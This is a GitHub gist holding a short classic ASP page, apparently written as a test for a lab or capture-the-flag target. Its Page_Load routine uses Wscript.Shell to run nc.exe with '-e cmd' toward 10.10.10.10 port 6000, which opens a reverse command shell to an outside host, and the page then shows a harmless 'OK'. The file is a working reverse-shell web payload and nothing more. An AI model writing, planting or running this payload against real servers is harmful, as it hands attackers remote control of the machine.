Created
January 24, 2019 17:10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<% | |
Sub Page_Load | |
'1st test | |
Dim objShell : Set objShell = Server.CreateObject("Wscript.Shell") | |
objshell.Run("C:\www\nc.exe 10.10.10.10 6000 -e cmd") | |
End Sub | |
%> | |
<!DOCTYPE html> | |
<html> | |
<body> | |
<% Page_Load %> | |
<h3>OK</h3> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment